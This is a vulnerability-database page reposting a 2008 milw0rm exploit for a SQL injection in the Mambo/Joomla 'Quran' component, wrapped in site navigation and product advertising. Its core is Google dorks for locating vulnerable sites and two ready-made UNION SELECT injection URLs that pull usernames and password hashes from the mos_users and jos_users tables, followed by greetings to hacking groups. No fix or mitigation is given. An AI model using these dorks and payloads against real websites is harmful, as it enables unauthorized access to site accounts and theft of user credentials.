Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 21 Views

Mambo Component Quran version 1.1 SQL Injection Vulnerability allows unauthorized access to user credential

Code

                                                +----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
--found by breaker_unit and Don
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Qur&#39;an component allows you to read and listen to the Qur&#39;an (The Islamic Holybook) online. A great resource for Islamic sites running on Mambo Open Source. This component was originally developed for PHP-Nuke by Syed Rasel at http://www.nzmuslim.net and then modified/ported to PostNuke and Mambo Open Source by Kemas Yunus Antonius.

Key Features:

    * Displaying the Qur&#39;an in Arabic and its translations.
    * Enhanced with search function (using any keywords or by chapter number and verse number).
    * Arabic recitation for both listening and downloading.
    * Very user friendly.
    * Using mysql database instead of file text.

Available translations at the moment:

    * English
    * Indonesian

You can get them all at http://www.kyantonius.com.
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
allinurl:&#34;com_quran&#34;
inurl:&#34;/index.php?option=com_quran&#34;
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Mambo
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--

Joomla
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--

Greetz to:
balcan-crew.org
milw0rm.com
h4cky0u.biz

# milw0rm.com [2008-02-15]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
mambo open sourcesql injectionuser credentials
21